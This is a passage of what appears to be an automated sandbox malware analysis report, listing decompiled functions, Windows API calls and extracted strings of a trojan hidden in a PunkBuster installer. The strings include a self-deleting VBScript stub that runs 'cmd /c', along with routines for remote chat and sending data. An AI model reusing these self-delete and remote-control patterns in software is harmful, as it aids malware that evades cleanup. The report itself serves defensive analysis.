                                              • SelectObject.GDI32(00000000,00000000), ref: 00439811
                                              • SelectObject.GDI32(00000000,?), ref: 00439828
                                              • SetBkColor.GDI32(00000000,00000000), ref: 00439842
                                              • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00330008), ref: 00439861
                                              • SelectObject.GDI32(00000000,?), ref: 0043986D
                                              • DeleteDC.GDI32(00000000), ref: 00439876
                                              • SelectObject.GDI32(00000000,?), ref: 0043987E
                                              • DeleteDC.GDI32(00000000), ref: 00439881
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: Object$Select$CreateDelete$Compatible$BitmapColor
                                              • String ID:
                                              • API String ID: 405077169-0
                                              • Opcode ID: ccb191d75c6a88419337b361c2f1c9a35ab3d4fcbf024475c7a481866e01d812
                                              • Instruction ID: 49661b4580e29581968163e5db868791f49a386c690e782eba182ce59999159b
                                              • Opcode Fuzzy Hash: ccb191d75c6a88419337b361c2f1c9a35ab3d4fcbf024475c7a481866e01d812
                                              • Instruction Fuzzy Hash: AA417935644350AFD300DF54D884F6BBBE8BB8DB00F14855AF9889B342C7B8EC058BA6
                                              Function 000C47EB Relevance: 18.1, APIs: 12, Instructions: 66synchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,000C4B8E,?,?,?,000C4B26), ref: 000C47FD
                                              • SetEvent.KERNEL32(?,?,?,?,00000000,?,000C4B8E,?,?,?,000C4B26), ref: 000C4808
                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,?,000C4B8E,?,?,?,000C4B26), ref: 000C4811
                                              • closesocket.WS2_32(000000FF), ref: 000C481F
                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,000C4B8E,?,?,?,000C4B26), ref: 000C4856
                                              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 000C4867
                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000C486E
                                              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000C4880
                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000C4885
                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000C488A
                                              • SetEvent.KERNEL32(?,?,?,?,00000000,?,000C4B8E,?,?,?,000C4B26), ref: 000C4895
                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,?,000C4B8E,?,?,?,000C4B26), ref: 000C489A
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                              • String ID:
                                              • API String ID: 3658366068-0
                                              • Opcode ID: 70c4d232a8ac00affc6412479df1bf10091f9f1b39081f4e0f19fdb953068247
                                              • Instruction ID: 96e8e291c42f19a5d738ebee9ae961450227e08779f3b1fa7f8c1905a42b3616
                                              • Opcode Fuzzy Hash: 70c4d232a8ac00affc6412479df1bf10091f9f1b39081f4e0f19fdb953068247
                                              • Instruction Fuzzy Hash: 2B214731044B54AFCB316F26DC09A5ABBF1FF40325B108A2DE1E212AF1CF72A891DB44
                                              Function 000D1C81 Relevance: 18.0, APIs: 9, Strings: 1, Instructions: 479sleepfileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 000D1C9A
                                                • Part of subcall function 000DAB38: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,00125900,000CC07B,.vbs,?,?,?,?,?,001342F8), ref: 000DAB5F
                                                • Part of subcall function 000D76B6: CloseHandle.KERNEL32(000C3AB9,?,?,000C3AB9,00125324), ref: 000D76CC
                                                • Part of subcall function 000D76B6: CloseHandle.KERNEL32(00125324,?,?,000C3AB9,00125324), ref: 000D76D5
                                              • Sleep.KERNEL32(0000000A,00125324), ref: 000D1DEC
                                              • Sleep.KERNEL32(0000000A,00125324,00125324), ref: 000D1E8E
                                              • Sleep.KERNEL32(0000000A,00125324,00125324,00125324), ref: 000D1F30
                                              • DeleteFileW.KERNEL32(00000000,00125324,00125324,00125324), ref: 000D1F91
                                              • DeleteFileW.KERNEL32(00000000,00125324,00125324,00125324), ref: 000D1FC8
                                              • DeleteFileW.KERNEL32(00000000,00125324,00125324,00125324), ref: 000D2004
                                              • Sleep.KERNEL32(000001F4,00125324,00125324,00125324), ref: 000D201E
                                              • Sleep.KERNEL32(00000064), ref: 000D2060
                                                • Part of subcall function 000C4468: send.WS2_32(?,00000000,00000000,00000000), ref: 000C44FD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                              • String ID: /stext "
                                              • API String ID: 1223786279-3856184850
                                              • Opcode ID: 75453d274842fc963fdf19d721664c1d78ffdfea8681f0ffd112bf4d1fcbdcb9
                                              • Instruction ID: 43965cef5d26c958f0cede2a4a95966a48bc56fd6ecb0351b1b04551ddbd2207
                                              • Opcode Fuzzy Hash: 75453d274842fc963fdf19d721664c1d78ffdfea8681f0ffd112bf4d1fcbdcb9
                                              • Instruction Fuzzy Hash: 700212315083419AD328FB60D8A1FEFB7D5AFE6310F50492DF48A86293EF709A49C756
                                              Function 004079B5 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 273COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 004079BA
                                                • Part of subcall function 004079B5: __EH_prolog.LIBCMT ref: 004078BB
                                              Strings
                                              • no-display, xrefs: 00407B79
                                              • **ERROR: You must specify install or un-install when using the no-prompts command-line switch., xrefs: 00407B2E
                                              • install-dlls, xrefs: 00407CE9
                                              • **ERROR: Error in command-line option specified., xrefs: 00407925, 00407945
                                              • skip-tests, xrefs: 00407CA9
                                              • **ERROR: You must specify install or un-install when using the no-display command-line switch., xrefs: 00407C45
                                              • Message, xrefs: 00407938, 00407B1E, 00407C38
                                              • install-nooverwrite, xrefs: 00407D34
                                              • no-prompts, xrefs: 00407A5B
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: **ERROR: You must specify install or un-install when using the no-display command-line switch.$ **ERROR: You must specify install or un-install when using the no-prompts command-line switch.$ **ERROR: Error in command-line option specified.$Message$install-dlls$install-nooverwrite$no-display$no-prompts$skip-tests
                                              • API String ID: 3519838083-2197801583
                                              • Opcode ID: c8681db5e3eba06fd4c152a01befb50f4238c0d281412fb061c6c0f0b5522ca5
                                              • Instruction ID: b915994dbbd29f52d1ea4df70baef6de42778e44b1b756d3316263f1e49830fe
                                              • Opcode Fuzzy Hash: c8681db5e3eba06fd4c152a01befb50f4238c0d281412fb061c6c0f0b5522ca5
                                              • Instruction Fuzzy Hash: AEB1A130D05289EEDB00EF61C945BED7BB4AF11304F50406FE885272E2DBB86B49CB99
                                              Function 00114982 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00114650: CreateFileW.KERNEL32(00000000,00000000,?,00114A2B,?,?,00000000,?,00114A2B,00000000,0000000C), ref: 0011466D
                                              • GetLastError.KERNEL32 ref: 00114A96
                                              • __dosmaperr.LIBCMT ref: 00114A9D
                                              • GetFileType.KERNEL32(00000000), ref: 00114AA9
                                              • GetLastError.KERNEL32 ref: 00114AB3
                                              • __dosmaperr.LIBCMT ref: 00114ABC
                                              • CloseHandle.KERNEL32(00000000), ref: 00114ADC
                                              • CloseHandle.KERNEL32(?), ref: 00114C26
                                              • GetLastError.KERNEL32 ref: 00114C58
                                              • __dosmaperr.LIBCMT ref: 00114C5F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                              • String ID: H
                                              • API String ID: 4237864984-2852464175
                                              • Opcode ID: a32b56bedcc994f839581ac6a60850539a3075bf4928f9d462dddaff9b70bee1
                                              • Instruction ID: fbd8ff4cdccffaf498c6945e8699b241d5d137a61061a8c3ca991d2ef4ca28a2
                                              • Opcode Fuzzy Hash: a32b56bedcc994f839581ac6a60850539a3075bf4928f9d462dddaff9b70bee1
                                              • Instruction Fuzzy Hash: A3A11232A041589FCF1D9F68D8527EE7BB1AB06324F24016DE811AF3D1DB718892CB95
                                              Function 00401DA2 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 240COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00401DA7
                                                • Part of subcall function 004016A9: __EH_prolog.LIBCMT ref: 004016AE
                                              Strings
                                              • n, xrefs: 00402055
                                              • SOFTWARE LICENSE AGREEMENTThe terms of this Software License Agreement (this "Agreement") shall apply to all versions, editions, and future updates of PunkBuster software and constitute a legal agreement between you (the "Licensee") and Even Balance, Inc. (t, xrefs: 00401F20
                                              • I &Agree, xrefs: 00401F7B
                                              • dialog, xrefs: 00401DB6
                                              • PunkBuster End User License Agreement, xrefs: 00401DCA
                                              • button, xrefs: 00401F6A, 00402012
                                              • text, xrefs: 00401E79
                                              • I &Disagree, xrefs: 00402023
                                              • , xrefs: 0040206C
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: $I &Agree$I &Disagree$PunkBuster End User License Agreement$SOFTWARE LICENSE AGREEMENTThe terms of this Software License Agreement (this "Agreement") shall apply to all versions, editions, and future updates of PunkBuster software and constitute a legal agreement between you (the "Licensee") and Even Balance, Inc. (t$button$dialog$n$text
                                              • API String ID: 3519838083-3872559604
                                              • Opcode ID: 33d5fe19a2b34a0dc1b8605e66f3fe6fe93fc4ecdc2eb80d450ec21c1a0649d0
                                              • Instruction ID: 241a5a671ada6123a631bfefd5bb6ca2289978ba863265d408999d36451ca270
                                              • Opcode Fuzzy Hash: 33d5fe19a2b34a0dc1b8605e66f3fe6fe93fc4ecdc2eb80d450ec21c1a0649d0
                                              • Instruction Fuzzy Hash: 8DA1AF70D00349EAEB05DFA4CC45BEEBBB4AF05308F10852EE551B62E1DBB81B48CB59
                                              Function 000D3C67 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 155COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: 65535$udp
                                              • API String ID: 0-1267037602
                                              • Opcode ID: 08571646cee7a88ed41693537ed2c1426c5e7bd922c8297254d65bffcea3f3c8
                                              • Instruction ID: 1c4a5f02da92bb15c3c11a6b7c5886dc54cc5839f768ec439057cd94f389e8e5
                                              • Opcode Fuzzy Hash: 08571646cee7a88ed41693537ed2c1426c5e7bd922c8297254d65bffcea3f3c8
                                              • Instruction Fuzzy Hash: F741F375609301ABD3A49A28E945B6B77E9EF84700F08482BF885963D1D764CE80DB77
                                              Function 000CC66D Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 147COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 000D1699: TerminateProcess.KERNEL32(00000000,pth_unenc,000CE670), ref: 000D16A9
                                                • Part of subcall function 000D1699: WaitForSingleObject.KERNEL32(000000FF), ref: 000D16BC
                                                • Part of subcall function 000D265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,001342F8), ref: 000D2679
                                                • Part of subcall function 000D265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 000D2692
                                                • Part of subcall function 000D265D: RegCloseKey.KERNEL32(00000000), ref: 000D269D
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 000CC6C7
                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00125900,00125900,00000000), ref: 000CC826
                                              • ExitProcess.KERNEL32 ref: 000CC832
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                              • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                              • API String ID: 1913171305-2411266221
                                              • Opcode ID: fbdc239a4843893773c8421267ad73ad7da80d24271633a03d6d0c095a1489c7
                                              • Instruction ID: da8997e3241d6891d90236ea1bea3acbadc248837a8418fac0f202eca4c792df
                                              • Opcode Fuzzy Hash: fbdc239a4843893773c8421267ad73ad7da80d24271633a03d6d0c095a1489c7
                                              • Instruction Fuzzy Hash: D9412331A10118AADB18F760DC56EFE7779AF61710F50416EF406A71D3EF306E9ACAA0
                                              Function 004C3E93 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 115COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,0050F7E8,00000118,004BC183,00000001,00000000,0050ED98,00000008,004C6487,00000000,00000000,00000000), ref: 004C3F14
                                              • _strlen.LIBCMT ref: 004C3F3A
                                              • _strlen.LIBCMT ref: 004C3F4B
                                              • _strlen.LIBCMT ref: 004C3F6E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: _strlen$FileModuleName
                                              • String ID: ...$<program name unknown>$Buffer overrun detected!$Microsoft Visual C++ Runtime Library$Program: $Unknown security failure detected!
                                              • API String ID: 1637341245-1673886896
                                              • Opcode ID: 69a06e9b40fbf20122ab49d451b4c53a99b7e7dd79e971efd0f63ee4cc165297
                                              • Instruction ID: b9b3d884a23d04d5a9ae845288b9d500708d593b82c7f80a618a4aa3ed5d7893
                                              • Opcode Fuzzy Hash: 69a06e9b40fbf20122ab49d451b4c53a99b7e7dd79e971efd0f63ee4cc165297
                                              • Instruction Fuzzy Hash: 4131C671D40218ABDB10AF658C87FDE7AB4EF04718F10445FF411AA1C2DB7C9B518BAA
                                              Function 000F9361 Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,000C1AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 000F93B9
                                              • GetLastError.KERNEL32(?,?,000C1AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 000F93C6
                                              • __dosmaperr.LIBCMT ref: 000F93CD
                                              • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,000C1AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 000F93F9
                                              • GetLastError.KERNEL32(?,?,?,000C1AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 000F9403
                                              • __dosmaperr.LIBCMT ref: 000F940A
                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,000C1AD8,?), ref: 000F944D
                                              • GetLastError.KERNEL32(?,?,?,?,?,?,000C1AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 000F9457
                                              • __dosmaperr.LIBCMT ref: 000F945E
                                              • _free.LIBCMT ref: 000F946A
                                              • _free.LIBCMT ref: 000F9471
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                              • String ID:
                                              • API String ID: 2441525078-0
                                              • Opcode ID: 2186cff1098e5f439e10bc789079d14fdd81131c894d8c4d3b5b132949f5e68b
                                              • Instruction ID: d5eafdc2cef70b5ba587b8774f8cb3c1fac0673aba0f44491a0dd4397ac091c9
                                              • Opcode Fuzzy Hash: 2186cff1098e5f439e10bc789079d14fdd81131c894d8c4d3b5b132949f5e68b
                                              • Instruction Fuzzy Hash: AB31C07190820EBFCF15AFA4CC45EBE3BBDEF11360B144119FA10966D0DB719D52ABA1
                                              Function 004387D0 Relevance: 16.6, APIs: 11, Instructions: 84windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetObjectA.GDI32(?,00000018,?), ref: 004387F8
                                              • CreateCompatibleDC.GDI32(00000000), ref: 00438819
                                              • CreateCompatibleDC.GDI32(00000000), ref: 0043881F
                                              • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 00438833
                                              • SelectObject.GDI32(00000000,?), ref: 00438843
                                              • SelectObject.GDI32(00000000,00000000), ref: 0043884B
                                              • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00330008), ref: 0043886A
                                              • SelectObject.GDI32(00000000,?), ref: 00438876
                                              • SelectObject.GDI32(00000000,?), ref: 0043887E
                                              • DeleteDC.GDI32(00000000), ref: 00438887
                                              • DeleteDC.GDI32(00000000), ref: 0043888A
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: Object$Select$Create$CompatibleDelete$Bitmap
                                              • String ID:
                                              • API String ID: 1675015043-0
                                              • Opcode ID: 3c81d8e50dfcbfe49c593cb458a6f868211e41e6d112929c436eba2b5acf46bf
                                              • Instruction ID: 7984cc7a5a7bcc0b52638dd99ff42acabcd130bd69c8778fa69ada57451c190c
                                              • Opcode Fuzzy Hash: 3c81d8e50dfcbfe49c593cb458a6f868211e41e6d112929c436eba2b5acf46bf
                                              • Instruction Fuzzy Hash: 71214A71644340ABD210EB698CC0F6BBBE8EBCDB50F44092DF648972A1D675E8008B66
                                              Function 000C4E52 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SetEvent.KERNEL32(?,?), ref: 000C4E71
                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 000C4F21
                                              • TranslateMessage.USER32(?), ref: 000C4F30
                                              • DispatchMessageA.USER32(?), ref: 000C4F3B
                                              • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00133F80), ref: 000C4FF3
                                              • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 000C502B
                                                • Part of subcall function 000C4468: send.WS2_32(?,00000000,00000000,00000000), ref: 000C44FD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                              • String ID: CloseChat$DisplayMessage$GetMessage
                                              • API String ID: 2956720200-749203953
                                              • Opcode ID: 6db07bedb5221c2031c458b36a9d3a58551b5416f557e1eb51510826e51694ef
                                              • Instruction ID: 31c9c8026770711460427171b496a09346ccbf6c7e78eb0a077e457135d23621
                                              • Opcode Fuzzy Hash: 6db07bedb5221c2031c458b36a9d3a58551b5416f557e1eb51510826e51694ef
                                              • Instruction Fuzzy Hash: E1418F71604300ABC714FB74D956EEEB7B9AB82710F404A2DF91297297EF34D905C7A2
                                              Function 004076BA Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 004076BF
                                              • GetSystemDirectoryA.KERNEL32(?,00000400), ref: 004076F9
                                              • _strncat.LIBCMT ref: 0040770C
                                              • _strncat.LIBCMT ref: 00407786
                                              • _strncat.LIBCMT ref: 004077FB
                                                • Part of subcall function 00406B6C: _strlen.LIBCMT ref: 00406B78
                                                • Part of subcall function 00406AE7: __EH_prolog.LIBCMT ref: 00406AEC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: _strncat$H_prolog$DirectorySystem_strlen
                                              • String ID: Courier New$\LogFiles$\PunkBuster$\pbsvc.log
                                              • API String ID: 666638376-3571523793
                                              • Opcode ID: ece0d52ea7ba4d625339ed649b6e816857d466a14f5f7f22f28f37991c993d12
                                              • Instruction ID: 26f8c4236d45206483bf339da4866ef4be8d7202687d2feb97467a2a947cf969
                                              • Opcode Fuzzy Hash: ece0d52ea7ba4d625339ed649b6e816857d466a14f5f7f22f28f37991c993d12
                                              • Instruction Fuzzy Hash: FF5182B280115CAACB14EBA5DD85BDD77BC9F15304F1080BFE909A71C2DB385B89CB69
                                              Function 00106DCB Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                              Download Yara Rule
                                              APIs
                                              • _free.LIBCMT ref: 00106DDF
                                                • Part of subcall function 00106AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0010FA50,?,00000000,?,00000000,?,0010FCF4,?,00000007,?,?,00110205,?), ref: 00106ADB
                                                • Part of subcall function 00106AC5: GetLastError.KERNEL32(?,?,0010FA50,?,00000000,?,00000000,?,0010FCF4,?,00000007,?,?,00110205,?,?), ref: 00106AED
                                              • _free.LIBCMT ref: 00106DEB
                                              • _free.LIBCMT ref: 00106DF6
